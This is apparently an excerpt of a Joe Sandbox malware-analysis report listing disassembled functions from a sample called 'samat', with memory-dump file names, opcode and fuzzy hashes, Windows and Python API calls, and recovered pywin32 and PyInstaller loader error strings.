                                                                                                                                                                                                                                                                                      • String ID: Oi:SetSecurityDescriptorOwner$SetSecurityDescriptorOwner$The object is not a PySID object
                                                                                                                                                                                                                                                                                      • API String ID: 965136164-2833774516
                                                                                                                                                                                                                                                                                      • Opcode ID: 7271bdf78a4c65457abcfe2ff72261ddf3eb67bcd4a8f1aaaa12165b7929d36e
                                                                                                                                                                                                                                                                                      • Instruction ID: 7818bf3ef79bb6a6104a734010ae116276f2facd7d8e9c7ecd61fcc13f9d2628
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7271bdf78a4c65457abcfe2ff72261ddf3eb67bcd4a8f1aaaa12165b7929d36e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB51F922A29B5299FB549FA9D8402BD23A1BF44FC8F894432EF0E57A65DE3CE445C340
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Dealloc$Arg_Err_KeywordsParseStringTupleTuple_
                                                                                                                                                                                                                                                                                      • String ID: Identifier must be PySID object when TrusteeForm = TRUSTEE_IS_SID$Identifier must be string/unicode when TrusteeForm = TRUSTEE_IS_NAME$Invalid value for TrusteeForm$The object is not a PySID object$Trustee must be a dictionary containing {MultipleTrustee,MultipleTrusteeOperation,TrusteeForm,TrusteeType,Identifier}$TrusteeForm not yet supported$llO|Ol
                                                                                                                                                                                                                                                                                      • API String ID: 959004690-581804069
                                                                                                                                                                                                                                                                                      • Opcode ID: e030765481a492b5f1dc0f46928bb67b82f3b6325f49a21945abdc45f2321e45
                                                                                                                                                                                                                                                                                      • Instruction ID: fa083cc5395260203b5663d012317e0e506eb01f8f58f607961cdd9fb5727abc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e030765481a492b5f1dc0f46928bb67b82f3b6325f49a21945abdc45f2321e45
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1051F472A08B4286EA208F59E84416D73A8FF88BD4F948035DB9E87B75DF3CE655C700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_$Buffer_ClearFormatFreeMem_ReleaseString$BufferCharLong_Object_OccurredUnicode_VoidWide
                                                                                                                                                                                                                                                                                      • String ID: Buffer cannot be None$Buffer length can be at most %d characters$WPARAM must be a unicode string, int, or buffer object (got %s)
                                                                                                                                                                                                                                                                                      • API String ID: 3109676845-3026970096
                                                                                                                                                                                                                                                                                      • Opcode ID: 638ec2c64d05b181e127cebc01ccb3966a1312f7bc25013f476e672dd9a6040d
                                                                                                                                                                                                                                                                                      • Instruction ID: a3943cdff9f4d925f6103daa20b5f2c2c26e7f3233dab9104f94796961764fb4
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 638ec2c64d05b181e127cebc01ccb3966a1312f7bc25013f476e672dd9a6040d
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E651E522A09B4296EB55CFADE54423C63A1FF48FC4F884031EB4E476A9DF3CE8959310
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_String$BuildCharFromUnicode_ValueWide
                                                                                                                                                                                                                                                                                      • String ID: Identifier$Invalid value for TrusteeForm$MultipleTrustee$MultipleTrusteeOperation$TrusteeForm$TrusteeForm not yet supported$TrusteeType${s:O,s:l,s:l,s:l,s:N}
                                                                                                                                                                                                                                                                                      • API String ID: 2305401427-1816636059
                                                                                                                                                                                                                                                                                      • Opcode ID: 11424eade5fed42f9f58899388f0ccfc8f6636113c6dcc90c7ab34a3f4ba7640
                                                                                                                                                                                                                                                                                      • Instruction ID: a5fff0cc59e3d41e2cdb1383eb2f07474321698189b58c79b0ca2549228c35f9
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 11424eade5fed42f9f58899388f0ccfc8f6636113c6dcc90c7ab34a3f4ba7640
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17412636A08B4286EA608B6DE84026D73A4FF88FD4F944231DB5D87779DF3CE5958740
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Authority$CountErrorIdentifierLastValid
                                                                                                                                                                                                                                                                                      • String ID: %lu$-%lu$0x%02hx%02hx%02hx%02hx%02hx%02hx$S-%lu-
                                                                                                                                                                                                                                                                                      • API String ID: 228009767-531523367
                                                                                                                                                                                                                                                                                      • Opcode ID: d6c7cb6490dbf970e67454a7506a052b5853455ff350a4c329918d20f5ccb460
                                                                                                                                                                                                                                                                                      • Instruction ID: 33b7cbe538dc5107a52868d75ef3ec67c067a2902caadf3f294de8b32edf3d7d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d6c7cb6490dbf970e67454a7506a052b5853455ff350a4c329918d20f5ccb460
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67516D63A0879282E7508B59A8542BE7BA0FB85FC5F444135EF8E43765DE3DD448DB00
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: String$Err_$AllocBytes_CharTaskWide$ByteFormatFreeMem_MultiSizeUnicode_memcpy
                                                                                                                                                                                                                                                                                      • String ID: <NULL!!>$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$value is larger than a DWORD
                                                                                                                                                                                                                                                                                      • API String ID: 1531658785-4125661472
                                                                                                                                                                                                                                                                                      • Opcode ID: 3347bce25c09ebf94e70747036ae54bb500433f39d5cdda55fb947e0f7a70fe8
                                                                                                                                                                                                                                                                                      • Instruction ID: 0d8e8787e8fa56a6a996d747ab7f503705774b4f348cdd83a153a14d64f456e8
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3347bce25c09ebf94e70747036ae54bb500433f39d5cdda55fb947e0f7a70fe8
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6941D622A0DB4686FA548F5AE44426D63A1BF89FC5F984635EB4E437B6DF3CE444C300
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: String$Err_$AllocBytes_CharTaskWide$ByteFormatFreeMem_MultiSizeUnicode_memcpy
                                                                                                                                                                                                                                                                                      • String ID: <NULL!!>$None is not a valid string in this context$Objects of type '%s' can not be converted to Unicode.$value is larger than a DWORD
                                                                                                                                                                                                                                                                                      • API String ID: 1531658785-4125661472
                                                                                                                                                                                                                                                                                      • Opcode ID: 168a535267c4d2021b12235baa8610be014cf2e5a84bacd634d05af756321a3e
                                                                                                                                                                                                                                                                                      • Instruction ID: e8dbe3799d1a0621776342bf9a6fc08b642c13bb1a0c8346d4a8f63e056c2e53
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 168a535267c4d2021b12235baa8610be014cf2e5a84bacd634d05af756321a3e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F541D222A0DB4282FA50CB9EE44427D63A1BF89FD4F884635EB4E577A6DF3CE4048340
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Item$Sequence_$DeallocDict_Err_Mapping_SizeTuple_$CheckClearItemsString
                                                                                                                                                                                                                                                                                      • String ID: Object must be a mapping (dictionary, class instance, etc$__dict__
                                                                                                                                                                                                                                                                                      • API String ID: 581612630-910247860
                                                                                                                                                                                                                                                                                      • Opcode ID: 5d4b3b7ce0b7b16c71f8fdb79b69360d59f5c68d73fa31168451f9c5b6ef5398
                                                                                                                                                                                                                                                                                      • Instruction ID: 3c541e246e33bde319878d9907548fa9e6f1bf12c6c6387a504c094668bbf4f1
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d4b3b7ce0b7b16c71f8fdb79b69360d59f5c68d73fa31168451f9c5b6ef5398
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A731E922E09B4686FB548FAEA84422D63A1EF49FD5F485035EF4E86775DF3CE4858700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • PyErr_Format.PYTHON313 ref: 00007FF8B7E830A6
                                                                                                                                                                                                                                                                                      • PyErr_SetString.PYTHON313 ref: 00007FF8B7E8310D
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00007FF8B7E83174
                                                                                                                                                                                                                                                                                      • GetLengthSid.ADVAPI32 ref: 00007FF8B7E83190
                                                                                                                                                                                                                                                                                      • PyErr_Format.PYTHON313 ref: 00007FF8B7E831BB
                                                                                                                                                                                                                                                                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E831CB
                                                                                                                                                                                                                                                                                      • PyErr_Format.PYTHON313 ref: 00007FF8B7E831F0
                                                                                                                                                                                                                                                                                      • memset.VCRUNTIME140 ref: 00007FF8B7E83203
                                                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140 ref: 00007FF8B7E83213
                                                                                                                                                                                                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B7E83278
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C41B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: FormatMessageW.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C48A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: PyUnicode_DecodeMBCS.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C568
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: Py_BuildValue.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C57D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: LocalFree.KERNEL32(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C595
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF8B7E8C400: PyErr_SetObject.PYTHON313(?,?,?,?,?,00000000,00000000,00007FF8B7E87A4D,?,?,00000000,00007FF8B7E87DC2,?,?,?,00007FF8B7E81931), ref: 00007FF8B7E8C5AA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_$Format$ErrorLast$BuildDecodeFreeLengthLocalMessageObjectStringUnicode_Valuefreemallocmemcpymemset
                                                                                                                                                                                                                                                                                      • String ID: %s not supported by this version of Windows$%s: adding ACE would put ACL over size limit$%s: unable to allocated %d bytes$The object is not a PySID object
                                                                                                                                                                                                                                                                                      • API String ID: 2123223808-1709335586
                                                                                                                                                                                                                                                                                      • Opcode ID: 23f19527f0bff15d9e74990f0f1674cade0e525a7b8c2d2658d9cfa4f814197a
                                                                                                                                                                                                                                                                                      • Instruction ID: c33c787613645983017adab3205b400e2bbd0567a6525e011aeda1a40a60c0fc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23f19527f0bff15d9e74990f0f1674cade0e525a7b8c2d2658d9cfa4f814197a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42610B26B0CB4281FA609B5AA85167E63A1BF89FC4F944435EF4D47BB6EF3CE4458700
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7E12C45F4,00000000,00007FF7E12C1985), ref: 00007FF7E12C93C9
                                                                                                                                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7E12C86B7,?,?,00000000,00007FF7E12C3CBB), ref: 00007FF7E12C822C
                                                                                                                                                                                                                                                                                        • Part of subcall function 00007FF7E12C2810: MessageBoxW.USER32 ref: 00007FF7E12C28EA
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                                                      • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                                                      • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                                                      • Opcode ID: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                                                                                      • Instruction ID: 2cc97a808fae56afa4ee59e3e19a0f94149b729cb8c39f9f790c874412a0d512
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34679b23be2e6a85bad270fe565fa16c5e09c528fb77942a9d4832d630ea4d55
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C51A311B1868281FB51BB20EC573BAE259AF94780FC59433DB0E836D5EEBCE544C362
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Long$FromLong_Unsigned$BuildValue
                                                                                                                                                                                                                                                                                      • String ID: OtherOperationCount$OtherTransferCount$ReadOperationCount$ReadTransferCount$WriteOperationCount$WriteTransferCount${s:N,s:N,s:N,s:N,s:N,s:N}
                                                                                                                                                                                                                                                                                      • API String ID: 3891383402-408589094
                                                                                                                                                                                                                                                                                      • Opcode ID: 4ee5e6750fb859370a58b46a6f2f982fc0eabf7e348b4551c1477cedafe3e123
                                                                                                                                                                                                                                                                                      • Instruction ID: 2d05e8069ec70994356cee73f1be1c00f4cbdf20f08c3d29ea626671d958ce0c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4ee5e6750fb859370a58b46a6f2f982fc0eabf7e348b4551c1477cedafe3e123
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7021A436A09B4296D710CB89F84846973A4FB88FD1B550236EE9D43728EF7CD555C740
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4567233837.00007FF7E12C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7E12C0000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567173824.00007FF7E12C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567302144.00007FF7E12EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E12FE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567366785.00007FF7E1301000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4567491108.00007FF7E1304000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff7e12c0000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                      • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                                                                      • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                                                                      • Opcode ID: c5839bb019746ec98c3466aa841b6b43dea5a335c893380da7bbb784120de0b7
                                                                                                                                                                                                                                                                                      • Instruction ID: 30411cdfb76d1865e385ef329db9a896927d2b266610695e4e2daec76b7fc569
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c5839bb019746ec98c3466aa841b6b43dea5a335c893380da7bbb784120de0b7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD51AE21B0864386EB15BB119C033AAA358BF84794FD44533EE4C47BA6DFBDE544D722
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000008.00000002.4572356980.00007FF8B7E81000.00000020.00000001.01000000.00000032.sdmp, Offset: 00007FF8B7E80000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572293871.00007FF8B7E80000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572423231.00007FF8B7E91000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572488323.00007FF8B7E9F000.00000004.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000008.00000002.4572551150.00007FF8B7EA2000.00000002.00000001.01000000.00000032.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ff8b7e80000_samat.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Err_String
                                                                                                                                                                                                                                                                                      • String ID: %s not supported by this version of Windows$%s: adding ACE would put ACL over size limit$%s: unable to allocated %d bytes$The object is not a PySID object
                                                                                                                                                                                                                                                                                      • API String ID: 1450464846-1709335586
                                                                                                                                                                                                                                                                                      • Opcode ID: a1e77c7967686f55aa96d559abd8a6b890d2a3f689a11bfbc787306795e293e7
                                                                                                                                                                                                                                                                                      • Instruction ID: 0b81a1e81528fdba771eaec19ba8b104d301faf84ce92caa0e31f370ff635edb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1e77c7967686f55aa96d559abd8a6b890d2a3f689a11bfbc787306795e293e7
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD512F26B0CB4282FB549B5AA85013E63A4BF85FC4F944035EF4E47BB6DE3CE5458704
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
